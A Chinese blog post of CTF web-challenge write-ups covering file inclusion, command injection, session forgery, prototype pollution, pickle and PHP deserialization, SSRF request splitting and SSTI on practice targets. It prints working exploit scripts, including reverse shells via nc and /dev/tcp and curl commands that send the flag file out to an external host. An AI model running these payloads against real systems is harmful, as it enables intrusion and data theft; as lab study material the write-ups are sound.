web 刷题(六)

阅读数: 次 2021-01-22

[N1CTF 2018]eating_cms

2021.1.23

考点

伪协议，文件包含，代码审计

做题步骤

一个登陆页面没发现什么特别，测试也没发现注入漏洞。于是扫下目录。

发现有个 login.php 就是对应的 index.php内容，没有特殊的信息，猜测可能有个注册页面

发现存在这个页面

直接注册一个账号登录

登录来到 user.php

根据路由结构猜测存在文件包含测试下。

php://filter/read=convert.base64-encode/resource= 去得到我们能知道的 php 文件的源码。

Index.php

<?php
require_once "function.php";
if(isset($_SESSION['login'] )){
    Header("Location: user.php?page=info");
}
else{
    include "templates/index.html";
}

function.php

<?php
session_start();
require_once "config.php";
function Hacker()
{
    Header("Location: hacker.php");
    die();
}


function filter_directory()
{
    $keywords = ["flag","manage","ffffllllaaaaggg"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function filter_directory_guest()
{
    $keywords = ["flag","manage","ffffllllaaaaggg","info"];
    $uri = parse_url($_SERVER["REQUEST_URI"]);
    parse_str($uri['query'], $query);
//    var_dump($query);
//    die();
    foreach($keywords as $token)
    {
        foreach($query as $k => $v)
        {
            if (stristr($k, $token))
                hacker();
            if (stristr($v, $token))
                hacker();
        }
    }
}

function Filter($string)
{
    global $mysqli;
    $blacklist = "information|benchmark|order|limit|join|file|into|execute|column|extractvalue|floor|update|insert|delete|username|password";
    $whitelist = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'(),_*`-@=+><";
    for ($i = 0; $i < strlen($string); $i++) {
        if (strpos("$whitelist", $string[$i]) === false) {
            Hacker();
        }
    }
    if (preg_match("/$blacklist/is", $string)) {
        Hacker();
    }
    if (is_string($string)) {
        return $mysqli->real_escape_string($string);
    } else {
        return "";
    }
}

function sql_query($sql_query)
{
    global $mysqli;
    $res = $mysqli->query($sql_query);
    return $res;
}

function login($user, $pass)
{
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "select * from `albert_users` where `username_which_you_do_not_know`= '$user' and `password_which_you_do_not_know_too` = '$pass'";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
    if ($res->num_rows) {
        $data = $res->fetch_array();
        $_SESSION['user'] = $data[username_which_you_do_not_know];
        $_SESSION['login'] = 1;
        $_SESSION['isadmin'] = $data[isadmin_which_you_do_not_know_too_too];
        return true;
    } else {
        return false;
    }
    return;
}

function updateadmin($level,$user)
{
    $sql = "update `albert_users` set `isadmin_which_you_do_not_know_too_too` = '$level' where `username_which_you_do_not_know`='$user' ";
    echo $sql;
    $res = sql_query($sql);
//    var_dump($res);
//    die();
//    die($res);
    if ($res == 1) {
        return true;
    } else {
        return false;
    }
    return;
}

function register($user, $pass)
{
    global $mysqli;
    $user = Filter($user);
    $pass = md5($pass);
    $sql = "insert into `albert_users`(`username_which_you_do_not_know`,`password_which_you_do_not_know_too`,`isadmin_which_you_do_not_know_too_too`) VALUES ('$user','$pass','0')";
    $res = sql_query($sql);
    return $mysqli->insert_id;
}

function logout()
{
    session_destroy();
    Header("Location: index.php");
}

?>

Config.php

<?php
error_reporting(E_ERROR | E_WARNING | E_PARSE);
define(BASEDIR, "/var/www/html/");
define(FLAG_SIG, 1);
$OPERATE = array('userinfo','upload','search');
$OPERATE_admin = array('userinfo','upload','search','manage');
$DBHOST = "localhost";
$DBUSER = "root";
$DBPASS = "Nu1LCTF2018!@#qwe";
//$DBPASS = "";
$DBNAME = "N1CTF";
$mysqli = @new mysqli($DBHOST, $DBUSER, $DBPASS, $DBNAME);
if(mysqli_connect_errno()){
        echo "no sql connection".mysqli_connect_error();
        $mysqli=null;
        die();
}
?>

User.php

<?php
require_once("function.php");
if( !isset( $_SESSION['user'] )){
    Header("Location: index.php");

}
if($_SESSION['isadmin'] === '1'){
    $oper_you_can_do = $OPERATE_admin;
}else{
    $oper_you_can_do = $OPERATE;
}
//die($_SESSION['isadmin']);
if($_SESSION['isadmin'] === '1'){
    if(!isset($_GET['page']) || $_GET['page'] === ''){
        $page = 'info';
    }else {
        $page = $_GET['page'];
    }
}
else{
    if(!isset($_GET['page'])|| $_GET['page'] === ''){
        $page = 'guest';
    }else {
        $page = $_GET['page'];
        if($page === 'info')
        {
//            echo("<script>alert('no premission to visit info, only admin can, you are guest')</script>");
            Header("Location: user.php?page=guest");
        }
    }
}
filter_directory();
//if(!in_array($page,$oper_you_can_do)){
//    $page = 'info';
//}
include "$page.php";
?>

Guest.php

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly ");
}
include "templates/guest.html";
?>

然后没有发现什么特别的文件。于是我们先进行代码审计。

在 function.php 中发现

有个过滤函数

我们发现这里的验证之前用到的是 parse_url() 函数。所以这里我们可以在 url 中加 \\ 从而实现函数绕过。

http://d26c27aa-f5e7-4848-ad61-3be6f230fe5d.node3.buuoj.cn//user.php?page=php://filter/read=convert.base64-encode/resource=ffffllllaaaaggg

得到内容

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}else {
    echo "you can find sth in m4aaannngggeee";
}
?>

发现有个 hit 我们继续访问。m4aaannngggeee

得到 upload.html

<?php
if (FLAG_SIG != 1){
    die("you can not visit it directly");
}
include "templates/upload.html";

?>

访问是一个文件上传路径

点击上传文件后执行的 upllloadddd.php 但是没有发现这个文件我们利用文件包含读取下这个文件的内容那个

http://d26c27aa-f5e7-4848-ad61-3be6f230fe5d.node3.buuoj.cn//user.php?page=php://filter/read=convert.base64-encode/resource=upllloadddd

<?php
$allowtype = array("gif","png","jpg");
$size = 10000000;
$path = "./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/";
$filename = $_FILES['file']['name'];
if(is_uploaded_file($_FILES['file']['tmp_name'])){
    if(!move_uploaded_file($_FILES['file']['tmp_name'],$path.$filename)){
        die("error:can not move");
    }
}else{
    die("error:not an upload file！");
}
$newfile = $path.$filename;
echo "file upload success<br />";
echo $filename;
$picdata = system("cat ./upload_b3bb2cfed6371dfeb2db1dbcceb124d3/".$filename." | base64 -w 0");
echo "<img src='data:image/png;base64,".$picdata."'></img>";
if($_FILES['file']['error']>0){
    unlink($newfile);
    die("Upload file error: ");
}
$ext = array_pop(explode(".",$_FILES['file']['name']));
if(!in_array($ext,$allowtype)){
    unlink($newfile);
}
?>

发现里面有个危险函数，可以存在代码执行。

先执行 system 后面才回判断文件上传的类型。

我们自己写一个提交表单


<html>
    <head>
    <meta charset="utf-8">
    <title>caoniam(runoob.com)</title>
    </head>
    <body>
     
    <form action="http://d26c27aa-f5e7-4848-ad61-3be6f230fe5d.node3.buuoj.cn//user.php?page=upllloadddd" method="post" enctype="multipart/form-data">
        <label for="file">fileName:</label>
        <input type="file" name="file" id="file"><br>
        <input type="submit" name="submit" value="commit">
    </form>
     
    </body>
</html>

修改文件名为 ;ls

发现命令执行了。于是看看能不能看到 flag文件。

/ 被过滤，我们利用 .. 来实现切换目录 ;cd ..;ls 查看 flag_233333

得到 flag ;cd ..;cat flag_233333

[HarekazeCTF2019]Easy Notes

2021.1.23

考点

session 反序列化

做题步骤

有 Home Get flag login in 三个选项

点击 get flag

说明要先登录。

题目是给了源码的

查看 flag.php

我们知道 flag是被写道环境变量中判断是不是 is_admin()

找到这个函数

猜测应该是一个 session 伪造的操作

去看看 session 的操作有哪些

找到 session 的保存位置 /var/www/tmp

然后发现在 export.php 中有对这个目录的操作

且这里会在同一目录创建文件，且有一个 str_replace() 会将 .. 替换为空 这里可以利用 type=. 利用

filename=sess_ 伪造一个session 文件。

这里的php session 是默认模式，也就是我们的 php 模式。

所以这里是可以够着对应伪造的 sess_xxxxxxxx 的。

伪造的 session 内容应该是 |N;admin|b:1;

是利用的用户名 + -xxxxxxxx. + type 来拼接的所以我们要创建用户名为 sess_

然后访问 export.php?type=.

这样我们会得到一个 sess_-xxxxxx 文件，也就是伪造的 session 文件。

然后修改我们的 session 为 -xxxxxxxx 然后访问 Get flag 得到flag

然后在网上学习到利用脚本来

import re
import requests
URL = 'http://2a739345-e013-4966-b766-f8a84f34e9d5.node3.buuoj.cn/'
while True:
	# login as sess_
	sess = requests.Session()
	sess.post(URL + 'login.php', data={
		'user': 'sess_'
	})

	# make a crafted note
	sess.post(URL + 'add.php', data={
		'title': '|N;admin|b:1;',
		'body': 'hello'
	})

	# make a fake session
	r = sess.get(URL + 'export.php?type=.').headers['Content-Disposition']
	print(r)
	
	sessid = re.findall(r'sess_([0-9a-z-]+)', r)[0]
	print(sessid)
	
	# get the flag
	r = requests.get(URL + '?page=flag', cookies={
		'PHPSESSID': sessid
	}).content.decode('utf-8')
	flag = re.findall(r'flag\{.+\}', r)

	if len(flag) > 0:
		print(flag[0])
		break

[SWPU2019]Web3

2021.1.24

考点

Session 伪造

unzip 软连接文件读取

做题步骤

可以登录。登录后，有个上传，但是上传有限制。

这里可能是和 session 有关

解密一下看看

解密脚本

import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode


def decryption(payload):
    payload, sig = payload.rsplit(b'.', 1)
    payload, timestamp = payload.rsplit(b'.', 1)

    decompress = False
    if payload.startswith(b'.'):
        payload = payload[1:]
        decompress = True

    try:
        payload = base64_decode(payload)
    except Exception as e:
        raise Exception('Could not base64 decode the payload because of '
                        'an exception')

    if decompress:
        try:
            payload = zlib.decompress(payload)
        except Exception as e:
            raise Exception('Could not zlib decompress the payload before '
                            'decoding the payload')

    return session_json_serializer.loads(payload)


if __name__ == '__main__':
    print(decryption(sys.argv[1].encode()))

解密得到结果

会记录我们的 password username 还有登录状况和 id值。

这个id 值可能计时我们是否有权限的限定。

想办法伪造session 这里我们伪造，需要先知道对应的 key是多少

一直没找到

查看wp 知道要访问不存在的页面会返回一个 key

解密得到 key

keyqqqwwweee!@#$%^&*

伪造一个 Key

伪造后成功进入 upload 页面

上传文件后提示只能是 zip

查看源码发现有注释，

@app.route('/upload',methods=['GET','POST'])
def upload():
    if session['id'] != b'1':
        return render_template_string(temp)
    if request.method=='POST':
        m = hashlib.md5()
        name = session['password']
        name = name+'qweqweqwe'
        name = name.encode(encoding='utf-8')
        m.update(name)
        md5_one= m.hexdigest()
        n = hashlib.md5()
        ip = request.remote_addr
        ip = ip.encode(encoding='utf-8')
        n.update(ip)
        md5_ip = n.hexdigest()
        f=request.files['file']
        basepath=os.path.dirname(os.path.realpath(__file__))
        path = basepath+'/upload/'+md5_ip+'/'+md5_one+'/'+session['username']+"/"
        path_base = basepath+'/upload/'+md5_ip+'/'
        filename = f.filename
        pathname = path+filename
        if "zip" != filename.split('.')[-1]:
            return 'zip only allowed'
        if not os.path.exists(path_base):
            try:
                os.makedirs(path_base)
            except Exception as e:
                return 'error'
        if not os.path.exists(path):
            try:
                os.makedirs(path)
            except Exception as e:
                return 'error'
        if not os.path.exists(pathname):
            try:
                f.save(pathname)
            except Exception as e:
                return 'error'
        try:
            cmd = "unzip -n -d "+path+" "+ pathname
            if cmd.find('|') != -1 or cmd.find(';') != -1:
				waf()
                return 'error'
            os.system(cmd)
        except Exception as e:
            return 'error'
        unzip_file = zipfile.ZipFile(pathname,'r')
        unzip_filename = unzip_file.namelist()[0]
        if session['is_login'] != True:
            return 'not login'
        try:
            if unzip_filename.find('/') != -1:
                shutil.rmtree(path_base)
                os.mkdir(path_base)
                return 'error'
            image = open(path+unzip_filename, "rb").read()
            resp = make_response(image)
            resp.headers['Content-Type'] = 'image/png'
            return resp
        except Exception as e:
            shutil.rmtree(path_base)
            os.mkdir(path_base)
            return 'error'
    return render_template('upload.html')


@app.route('/showflag')
def showflag():
    if True == False:
        image = open(os.path.join('./flag/flag.jpg'), "rb").read()
        resp = make_response(image)
        resp.headers['Content-Type'] = 'image/png'
        return resp
    else:
        return "can't give you"

/upload 路由

上传一个 zip 文件。

上传的为压缩的图片

服务器进行解压

文件名不能有 /

/showflag 路由

这个路由不能调用

但是给出了我们对应的 flag 的位置 ./flag/flag.jpg

解压命令利用的 cmd = "unzip -n -d "+path+" "+ pathname

这里对我们上传文件进行操作的命令就是这个 unzip函数。且这是一个 python 题目尝试利用包含上传 php 文件是不行的

https://xz.aliyun.com/t/2589

https://paper.seebug.org/104/

利用软连接+unzip 解压得到文件内容

上传这个文件。

[网鼎杯 2020 青龙组]notes

2021.1.24

考点

做题步骤

题目给了源码

审计代码。发现一个很重要的点

/status 路由中找到一个函数调用

这里会调用 commands 的数组内容，这里首先想到的就是利用原型链污染

然后我们要找的是怎么才能去修改 __proto__

发现有一个 undefsafe 可能会利用这个函数。

https://snyk.io/vuln/SNYK-JS-UNDEFSAFE-548940

发现是可以利用实现原型链污染的

这个点在 /edit_notes 里面

利用 payload

利用外带。

import requests

s = requests.session()
data={'raw':'curl 47.95.xxxxxx/?`cat /flag`','id':'__proto__','author':'byc_404'}
url='http://f4b7f68d-fa06-4aa1-ab06-43a2d84e5ffe.node3.buuoj.cn/'
r=s.post(url+'edit_note',json=data)
print(r.text)
r=s.get(url+"status")
print(r.text)

得到 flag

或者利用注意空格和 & 要进行编码

id=__proto__.a&author=bash+-i+>%26+/dev/tcp/47.95.xxxxxx/8888+0>%261&raw=123

反弹shell 得到 flag

[watevrCTF-2019]Pickle Store

2021.1.25

考点

python 反序列化

做题步骤

一个购买网页

刚开始我们有 500

最后一个是 flag 但是价格很高。需要 1000这里猜测是有一个伪造

抓包看到购买的时候是传的参数是对应的 id

返回有个 set-session

没看到什么有用信息。扫下目录

但是没有扫到什么东西。

session base64 解密有可以看到的关键词

有个 money

要去百度下。百度题目名字发现 Pickle

应该是 python 反序列化的解密看看session

这样我们就能看到对应的内容了

https://www.anquanke.com/post/id/188981

https://xz.aliyun.com/t/7436

exp

import base64
import pickle


class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 47.95.xxxxxx 8888 -e/bin/sh')",))
a = A()
print( base64.b64encode( pickle.dumps(a) ) )

接着我们利用得到的值修改session 然后去购买一个物品

这就就会对我们的 session 解密从而反弹shell

[RCTF 2019]Nextphp

2021.1.25

考点

php7.4.0 预加载

https://zhzhdoai.github.io/2019/05/21/RCTF-nextphp%E9%A2%98%E8%A7%A3/

https://blog.ainassine.cn/blog/public/2019/05/22/rctf-2019-writeup

https://althims.com/2019/06/24/RCTF-nextphp/

FFI 绕过 disable_functions

做题步骤

<?php
if (isset($_GET['a'])) {
    eval($_GET['a']);
} else {
    show_source(__FILE__);
}

直接 get 加 eval

这种不肯能这么简单，所以我们需要先看看 phpinfo

得到版本

然后看看有没有什么特别的信息。

发现有一个 php 文件

我们要查看这个文件，利用函数 show_source

/?a=show_source(%27preload.php%27);

<?php
final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'print_r',
        'arg' => '1'
    ];

    private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

    public function __serialize(): array {
        return $this->data;
    }

    public function __unserialize(array $data) {
        array_merge($this->data, $data);
        $this->run();
    }

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
        $this->run();
    }

    public function __get ($key) {
        return $this->data[$key];
    }

    public function __set ($key, $value) {
        throw new \Exception('No implemented');
    }

    public function __construct () {
        throw new \Exception('No implemented');
    }
}

然后就没有头绪了。

看了下 wp

这里用到的是 php7.4.0 的新特性预加载。可以利用php.ini开启opcache预加载。

Phpinfo 里面可以知道预加载了 preload.php

被预加载的文件会被整个执行或者加载其他的文件。也就是说我们可以通过preload.php执行命令，而通过serialize函数我们可以触发其执行。

可以调用 preload.php 里面的反序列化，但是我们还要绕过 disable_functions

利用加载的 FFi 模块

https://wiki.php.net/rfc/ffi

可以利用 FFI 调用 libc 中的函数

根据上面的 class A 的代码。我们可以够着对应的payload

final class A implements Serializable {
    protected $data = [
        'ret' => null,
        'func' => 'FFI::cdef',
        'arg' => 'int system(const char *command);'
    ];

    public function serialize (): string {
        return serialize($this->data);
    }

    public function unserialize($payload) {
        $this->data = unserialize($payload);
    }
}

$a = new A();
echo serialize($a);

然后给内容赋值

1
2
3

private function run () {
        $this->data['ret'] = $this->data['func']($this->data['arg']);
    }

?a=$a=unserialize('C:1:"A":95:{a:3:{s:3:"ret";N;s:4:"func";s:9:"FFI::cdef";s:3:"arg";s:32:"int system(const char *command);";}}');$a->__serialize()['ret']->system('curl 47.95.xxxxxs:8888/`cat /flag |base64` ');

得到后解密

[RootersCTF2019]babyWeb

2021.1.25

考点

做题步骤

开局一个报错信息。

但是访问 index.php 页面就是好的

过滤了：union、sleep、'、"、or、-、benchmark

首先想到测试一下万能密码直接就出 flag 了

?search=1 || 1=1 limit 1

[FireshellCTF2020]Caas

2021.1.26

考点

利用编译报错得到 flag

做题步骤

打开网页

输入后会报错

因为有编译首先想到的是网鼎杯里面的一个利用 #include "/flag" 利用报错信息得到 flag的方法

得到 flag

[NESTCTF 2019]Love Math 2

2021.1.26

考点

做题步骤

有源码

<?php
error_reporting(0);
//听说你很喜欢数学，不知道你是否爱它胜过爱flag
if(!isset($_GET['c'])){
    show_source(__FILE__);
}else{
    //例子 c=20-1
    $content = $_GET['c'];
    if (strlen($content) >= 60) {
        die("太长了不会算");
    }
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $content)) {
            die("请不要输入奇奇怪怪的字符");
        }
    }
    //常用数学函数http://www.w3school.com.cn/php/php_ref_math.asp
    $whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
    preg_match_all('/[a-zA-Z_\x7f-\xff][a-zA-Z_0-9\x7f-\xff]*/', $content, $used_funcs);
    foreach ($used_funcs[0] as $func) {
        if (!in_array($func, $whitelist)) {
            die("请不要输入奇奇怪怪的函数");
        }
    }
    //帮你算出答案
    eval('echo '.$content.';');
}

构建命令执行

不能含有空格，\t，\r，\n，\，单双引号，中括号

且利用的是 whitelist 里面的字符

利用里面的方法构造出一句话。

这里首先想到的是利用异或看看异或能不能使用

可以使用

$whitelist = ['abs', 'acos', 'acosh', 'asin', 'asinh', 'atan2', 'atan', 'atanh',  'bindec', 'ceil', 'cos', 'cosh', 'decbin' , 'decoct', 'deg2rad', 'exp', 'expm1', 'floor', 'fmod', 'getrandmax', 'hexdec', 'hypot', 'is_finite', 'is_infinite', 'is_nan', 'lcg_value', 'log10', 'log1p', 'log', 'max', 'min', 'mt_getrandmax', 'mt_rand', 'mt_srand', 'octdec', 'pi', 'pow', 'rad2deg', 'rand', 'round', 'sin', 'sinh', 'sqrt', 'srand', 'tan', 'tanh'];
$convert = ['decbin','decoct'];
foreach($whitelist as $a){
    foreach($convert as $b){
        for($i=0;$i<999999;$i++){
            $result = $a ^ $b($i);
            if(preg_match('/_GET|_POST|_REQUEST/',$result)){
                echo $a."^".$b."(".$i.")=".$result."\n";
            }
        }
    }

最后使用

c=$pi=${hexdec^decoct(31737)};$pi{0}($pi{1});

post 传入 0=system&1=cat /flag

[GYCTF2020]Node Game

2021.1.27

考点

nodejs

https://0xgeekcat.github.io/Node-js%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0-GYCTF2020-Node-Game.html

拆分攻击（伪造 http 头

https://0xgeekcat.github.io/%E5%AD%A6%E4%B9%A0%E9%80%9A%E8%BF%87%E6%8B%86%E5%88%86%E6%94%BB%E5%87%BB%E5%AE%9E%E7%8E%B0%E7%9A%84SSRF%E6%94%BB%E5%87%BB.html

做题步骤

首先得到源代码，直接点击


var express = require('express');
var app = express();
var fs = require('fs');
var path = require('path');  // 限定路径。
var http = require('http');
var pug = require('pug');
var morgan = require('morgan');
const multer = require('multer');


app.use(multer({dest: './dist'}).array('file'));
app.use(morgan('short'));
app.use("/uploads",express.static(path.join(__dirname, '/uploads')))
app.use("/template",express.static(path.join(__dirname, '/template')))


app.get('/', function(req, res) {
    var action = req.query.action?req.query.action:"index";
  	// 不存在 目录穿透
    if( action.includes("/") || action.includes("\\") ){
        res.send("Errrrr, You have been Blocked");
    }
  	// 存储 `/temlate/[action].pug` 的文件。且前端显示
    file = path.join(__dirname + '/template/'+ action +'.pug');
    var html = pug.renderFile(file);
    res.send(html);
});

app.post('/file_upload', function(req, res){
    var ip = req.connection.remoteAddress;
    var obj = {
        msg: '',
    }
    // 文件上传必须为 127.0.0.1  （可能是ip伪造 可能是ssrf
    if (!ip.includes('127.0.0.1')) {
        obj.msg="only admin's ip can use it"
        res.send(JSON.stringify(obj));
        return 
    }
    fs.readFile(req.files[0].path, function(err, data){
        if(err){
            obj.msg = 'upload failed';
            res.send(JSON.stringify(obj));
        }else{
          	// 文件储存在 `/uploads/[req.files[0].mimetype]/文件名`
          	// 这里的文件上传路径规定，没有对 `./` 的检测
            var file_path = '/uploads/' + req.files[0].mimetype +"/";
            var file_name = req.files[0].originalname
            var dir_file = __dirname + file_path + file_name
            // 文件不存在 就会创建对应文件。
            if(!fs.existsSync(__dirname + file_path)){
                try {
                    fs.mkdirSync(__dirname + file_path)
                } catch (error) {
                    obj.msg = "file type error";
                    res.send(JSON.stringify(obj));
                    return
                }
            }
          	// 显示文件上传成功
            try {
                fs.writeFileSync(dir_file,data)
                obj = {
                    msg: 'upload success',
                    filename: file_path + file_name
                } 
            } catch (error) {
                obj.msg = 'upload failed';
            }
            res.send(JSON.stringify(obj));    
        }
    })
})

// 显示源码文件
app.get('/source', function(req, res) {
    res.sendFile(path.join(__dirname + '/template/source.txt'));
});


app.get('/core', function(req, res) {
    var q = req.query.q;
    var resp = "";
    if (q) {
        var url = 'http://localhost:8081/source?' + q
        console.log(url)
      	// 检测 url 是否存在 黑名单 字符
        var trigger = blacklist(url);
        if (trigger === true) {
            res.send("<p>error occurs!</p>");
        } else {
            try {
              	// 这里会让 服务自己get 请求一个 url。 访问本站点 ip 为 127.0.0.1
              	// 可以利用这个来上传文件。这样就能 实现上传为 admin （127.0.0.1）
                http.get(url, function(resp) {
                    resp.setEncoding('utf8');
                    resp.on('error', function(err) {
                    if (err.code === "ECONNRESET") {
                     console.log("Timeout occurs");
                     return;
                    }
                   });
										// 将我们的 运行结果返回 `toString()` 然后输出。
                    resp.on('data', function(chunk) {
                        try {
                         resps = chunk.toString();
                         res.send(resps);
                        }catch (e) {
                           res.send(e.message);
                        }
 
                    }).on('error', (e) => {
                         res.send(e.message);});
                });
            } catch (error) {
                console.log(error);
            }
        }
    } else {
        res.send("search param 'q' missing!");
    }
})

// 黑名单检测
function blacklist(url) {
    var evilwords = ["global", "process","mainModule","require","root","child_process","exec","\"","'","!"];
    var arrayLen = evilwords.length;
    for (var i = 0; i < arrayLen; i++) {
        const trigger = url.includes(evilwords[i]);
        if (trigger === true) {
            return true
        }
    }
}

var server = app.listen(8081, function() {
    var host = server.address().address
    var port = server.address().port
    console.log("Example app listening at http://%s:%s", host, port)
})

有个路由 /file_upload

这个路由，需要我们检测ip 为 127.0.0.1

/core 可以用来够着 ssrf 所以，我们可以利用来绕过 127.0.0.1 的检测

且我们发现我们可以利用拆分攻击伪造对应的 file_upload 上传对应的 pug 文件，然后访问让他能够实现解析，我们自己上传的 Pug 文件包含我们要查看的 flag 文件，这样解析后就能得到flag 文件了。

https://pugjs.org/zh-cn/language/includes.html

利用 Pug 的文件包含。

import urllib.parse
import requests

payload = ''' HTTP/1.1
Host: x
Connection: keep-alive

POST /file_upload HTTP/1.1
Content-Type: multipart/form-data; boundary=--------------------------919695033422425209299810
Connection: keep-alive
cache-control: no-cache
Host: x
Content-Length: 292

----------------------------919695033422425209299810
Content-Disposition: form-data; name="file"; filename="glzjin.pug"
Content-Type: /../template

doctype html
html
  head
    style
      include ../../../../../../../flag.txt

----------------------------919695033422425209299810--

GET /flag HTTP/1.1
Host: x
Connection: close
x:'''
payload = payload.replace("\n", "\r\n")
payload = ''.join(chr(int('0xff' + hex(ord(c))[2:].zfill(2), 16)) for c in payload)
print(payload)
r = requests.get('http://b23af481-2e35-4877-b661-fc6c0e3aff0e.node3.buuoj.cn/core?q=' + urllib.parse.quote(payload))
print(r.text)
print(requests.get('http://b23af481-2e35-4877-b661-fc6c0e3aff0e.node3.buuoj.cn/?action=jly').text)

[NPUCTF2020]验证🐎

2021.1.29

考点

Nodejs

做题步骤

得到源码

const express = require('express');
const bodyParser = require('body-parser');
const cookieSession = require('cookie-session');

const fs = require('fs');
const crypto = require('crypto');

const keys = require('./key.js').keys;

function md5(s) {
  return crypto.createHash('md5')
    .update(s)
    .digest('hex');
}

function saferEval(str) {
  if (str.replace(/(?:Math(?:\.\w+)?)|[()+\-*/&|^%<>=,?:]|(?:\d+\.?\d*(?:e\d+)?)| /g, '')) {
    return null;
  }
  return eval(str);
} // 2020.4/WORKER1 淦，上次的库太垃圾，我自己写了一个

const template = fs.readFileSync('./index.html').toString();
function render(results) {
  return template.replace('{{results}}', results.join('<br/>'));
}

const app = express();

app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

app.use(cookieSession({
  name: 'PHPSESSION', // 2020.3/WORKER2 嘿嘿，给👴爪⑧
  keys
}));

Object.freeze(Object);
Object.freeze(Math);

app.post('/', function (req, res) {
  let result = '';
  const results = req.session.results || [];
  const { e, first, second } = req.body;
  if (first && second && first.length === second.length && first!==second && md5(first+keys[0]) === md5(second+keys[0])) {
    if (req.body.e) {
      try {
        result = saferEval(req.body.e) || 'Wrong Wrong Wrong!!!';
      } catch (e) {
        console.log(e);
        result = 'Wrong Wrong Wrong!!!';
      }
      results.unshift(`${req.body.e}=${result}`);
    }
  } else {
    results.unshift('Not verified!');
  }
  if (results.length > 13) {
    results.pop();
  }
  req.session.results = results;
  res.send(render(req.session.results));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码，用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  req.session.admin = req.session.admin || 0;
  res.send(render(req.session.results = req.session.results || []))
});

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

有一个 eval 函数的调用

跟路由下会调用到这个函数

正则匹配中只能出现 ()+\-*/&|^%<>=,?:

想要进行调用要绕过前面的 if 语句

first && second && first.length === second.length && first!==second && md5(first+keys[0]) === md5(second+keys[0])

使用弱类型转换就能实现

first=1 second=[1] md5处理是利用 + 两个数字会相等。

这样我们就能绕过从而调用后面的 safeEval

根据过滤我们知道，可以调用 Math 对应的函数，

我们要调用系统命令

利用· global.process.mainModule.constructor._load('child_process').exec('calc')

以为我们可以使用 => 所以我们要利用这两个符号构造匿名函数，

根据过滤我们还可以输入数字。

所以我们要利用方法构造对应的匿名函数调用系统命令实现函数调用

这里我们要够着的函数

看了下 wp

https://z3ratu1.github.io/%5BNPUCTF2020%5D%E9%AA%8C%E8%AF%81%F0%9F%90%8E.html

http://wh1sper.com/npuctf2020_wp/

构造

1
2

(Math+1).constructor.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,99,97,116,32,47,102,108,97,103,39,41)
// "return process.mainModule.require('child_process').execSync('cat /flag')"

payload content-Type改为application/json

{"e":"(Math=>(Math=Math.constructor,Math.x=Math.constructor(Math.fromCharCode(114,101,116,117,114,110,32,112,114,111,99,101,115,115,46,109,97,105,110,77,111,100,117,108,101,46,114,101,113,117,105,114,101,40,39,99,104,105,108,100,95,112,114,111,99,101,115,115,39,41,46,101,120,101,99,83,121,110,99,40,39,99,97,116,32,47,102,108,97,103,39,41))()))(Math+1)","first":"1","second":[1]}

首先构造 function 类型

根据wp 的

Math=Math+1
#fromCharCode函数必须是在string类型上用。
Math=Math.constructor
#定义了string类型
Math=Math.construtor
#定义了function类型
Math.constructor,Math=Math.constructor(Math.fromCharCode(97,108,101,114,116,40,49,41))()
等同于
function(string.fromCharCode(xxxxxxxxx)()

从而构造出调用。

[GWCTF 2019]你的名字

2021.2.3

考点

ssti

利用

做题步骤

输入东西会直接显示我们的名字。直接会想到魔板注入

扫描目录没有发现什么东西是一个 index.php 但是测试发现应该是 python的 ssti 注入

1
2
3

{{ 双大括号内包裹的内容 }}：装载一个变量，模板渲染的时候，会使用传进来的同名参数这个变量代表的值替换掉。
{% raw %}：装载一个控制语句。
{# #}：装载一个注释，模板渲染的时候会忽视这中间的值。

当我们输入 {{7*7}} 会报错

看了 wp 才知道这个应该是他自己写的一个报错误导

发现过滤了

'import', 'getattr', 'os', 'class', 'subclasses', 'mro', 'request', 'args', 'eval', 'if', 'for',' subprocess', 'file', 'open', 'popen', 'builtins', 'compile', 'execfile', 'from_pyfile', 'local','self', 'item', 'getitem', 'getattribute', 'func_globals', 'config'

上面的内容会被替换为空

我们可以利用双写绕过

1	{% iconfigf ''.__claconfigss__.__mconfigro__[2].__subclaconfigsses__()[59].__init__.func_glconfigobals.lineconfigcache.oconfigs.popconfigen('curl xxxxx/ -d `cat /flag_1s_Hera`;') %}1{% endiconfigf %}

